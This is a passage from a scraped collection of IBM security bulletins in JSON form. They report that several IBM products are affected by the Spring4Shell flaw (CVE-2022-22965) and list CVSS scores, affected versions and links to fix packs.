https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| 7.3| \n\nP104637\n\nP104651\n\nP104653\n\nP104656\n\nP104676\n\nP104677\n\n| \n\n[sym-7.3-build601113](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601113&includeSupersedes=0> \"sym-7.3-build601113\" )\n\n[sym-7.3-build601128](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601128&includeSupersedes=0> \"sym-7.3-build601128\" )\n\n[sym-7.3-build601137](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601137&includeSupersedes=0> \"sym-7.3-build601137\" )\n\n[sym-7.3-build601138](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601138&includeSupersedes=0> \"sym-7.3-build601138\" )\n\n[sym-7.3-build601161](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601161&includeSupersedes=0> \"sym-7.3-build601161\" 
)\n\n[sym-7.3-build601162](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build601162&includeSupersedes=0> \"sym-7.3-build601162\" ) \n \nIBM Spectrum Symphony| 7.3.1| \n\nP104630\n\nP104643\n\nP104644\n\nP104645\n\nP104649\n\nP104650\n\n| \n\n[sym-7.3.1-build601108](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601108&includeSupersedes=0> \"sym-7.3.1-build601108\" )\n\n[sym-7.3.1-build601120](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601120&includeSupersedes=0> \"sym-7.3.1-build601120\" )\n\n[sym-7.3.1-build601122](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601122&includeSupersedes=0> \"sym-7.3.1-build601122\" )\n\n[sym-7.3.1-build601124](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601124&includeSupersedes=0> \"sym-7.3.1-build601124\" )\n\n[sym-7.3.1-build601125](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601125&includeSupersedes=0> \"sym-7.3.1-build601125\" )\n\n[sym-7.3.1-build601126](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build601126&includeSupersedes=0> \"sym-7.3.1-build601126\" ) \n \nIBM Spectrum Symphony| 7.3.2| \n\nP104634\n\nP104654\n\nP104670\n\nP104671\n\nP104678\n\nP104679\n\n| 
\n\n[sym-7.3.2-build601111](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601111&includeSupersedes=0> \"sym-7.3.2-build601111\" )\n\n[sym-7.3.2-build601143](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601143&includeSupersedes=0> \"sym-7.3.2-build601143\" )\n\n[sym-7.3.2-build601154](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601154&includeSupersedes=0> \"sym-7.3.2-build601154\" )\n\n[sym-7.3.2-build601155](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601155&includeSupersedes=0> \"sym-7.3.2-build601155\" )\n\n[sym-7.3.2-build601164](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601164&includeSupersedes=0> \"sym-7.3.2-build601164\" )\n\n[sym-7.3.2-build601165](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601165&includeSupersedes=0> \"sym-7.3.2-build601165\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-06-20T03:16:58", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Symphony is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T03:16:58", "id": "E7653A5862D76B5A32167F623532FE5567AFABF9A426F06C2CBA21BE4039657F", "href": "https://www.ibm.com/support/pages/node/6596873", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:49", "description": "## Summary\n\nIBM Watson Knowledge Catalog in Cloud Pak for Data is potentially vulnerable to arbitrary code execution due to Java Spring data binding vulnerability (CVE-2022-22965).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. 
\nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Knowledge Catalog on-prem| 3.5.1 \nIBM Watson Knowledge Catalog on-prem| 4.0 \n \n\n\n## Remediation/Fixes\n\n** IBM strongly recommends addressing the vulnerability now by upgrading. **\n\nInstall Watson Knowledge Catalog 4.0.8 (Refresh 8) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=new-watson-knowledge-catalog>\n\nInstall Watson Knowledge Catalog 3.5.10 (Refresh 13) or above: <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=new-watson-knowledge-catalog>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T16:01:59", "type": "ibm", "title": "Security Bulletin: Java Spring vulnerability impacts IBM Watson Knowledge Catalog in Cloud Pak for Data (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-06T16:01:59", "id": "D9E06E5C382B357DD50008C0D277DB7D1B6D088C158C56C3D022303F1DFC00A4", "href": "https://www.ibm.com/support/pages/node/6583465", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:33", "description": "## Summary\n\nIBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2.0.0 - 6.2.0.3_iFix012 \n \n\n\n## Remediation/Fixes \n \n--- \nIBM recommends addressing the possible vulnerability now by upgrading. **Affected Product(s)**| **Version(s)**| **APAR \n**| **Remediation / First Fix \n** \n---|---|---|--- \nIBM Sterling Connect:Direct for Microsoft Windows| 6.2| None| Apply [6.2.0.4](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+Microsoft+Windows&release=6.2.0.4&platform=All&function=fixId&fixids=6.2.*.*-IBMConnectDirectforMicrosoftWindows-x64-fp*> \"6.2.0.4\" ), available on Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T12:12:42", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for Microsoft Windows is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-11T12:12:42", "id": "9559CE1CF845BE27801B9A76018F0E7FFBD3159BCFFEE9D25526E6D24FA5F367", "href": "https://www.ibm.com/support/pages/node/6584984", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:29:07", "description": "## Summary\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling B2B Integrator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. 
Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:07:31", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:07:31", "id": "8F4CAEB4814182DEBFBE7DFCA9FC13E3577204C307181835FA0E1CA012CAD9E1", "href": "https://www.ibm.com/support/pages/node/6570975", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:07:43", "description": "## Summary\n\nIBM Cognos Command Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. 
Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Cognos Command Center as a direct dependency of ActiveMQ. IBM Cognos Command Center 10.2.4.1 has upgraded to ActiveMQ 5.17.1 which uses Spring 5.3.19. ActiveMQ 5.17.1 requires Java 11 as a minimum version, therefore IBM Cognos Command Center has upgraded to IBM\u00ae Semeru JRE 11.0.14.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Command Center 10.2.4.1\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security update:\n\n[IBM Cognos Command Center 10.2.4 Fix Pack 1 IF16](<https://www.ibm.com/support/pages/node/6890671>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-01T20:05:48", "type": "ibm", "title": "Security Bulletin: IBM Cognos Command Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-03-01T20:05:48", "id": "A871939B5F51CA69B0EDBC21D1816A26D5E84C73FB45D47DF354F899F5F6BB9B", "href": "https://www.ibm.com/support/pages/node/6590487", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:09", "description": "## Summary\n\nIBM Planning Analytics Workspace is affected but not classified as vulnerable to a remote code execution in 
Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in IBM Planning Analytics Workspace in Server Side Rest APIs as an indirect dependency by MongoDB that is used to store content. IBM Planning Analytics Workspace includes Spring 5.2.20. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security updates:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central](<https://www.ibm.com/support/pages/node/6584994> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central\" ) \n \n\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0 on premise offerings. This has been addressed on IBM Planning Analytics with Watson and no further action is required.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-17T16:21:25", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics Workspace is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-17T16:21:25", "id": 
"E0AC0F2CEF0686FD5D35D040E442195982E92EF98BDFD841F5F62D37D0337B68", "href": "https://www.ibm.com/support/pages/node/6586658", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:52", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its development infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data| 1.5.0, 4.0.0, 
4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T07:36:23", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T07:36:23", "id": 
"DD71E3BE311976CFF7FE89F0916C7047300E0A1E779B1D8D85CA991081F0FBC3", "href": "https://www.ibm.com/support/pages/node/6581969", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:34:03", "description": "## Summary\n\nIBM InfoSphere Information Server is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in our REST APIs and application deployment inside containers. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using 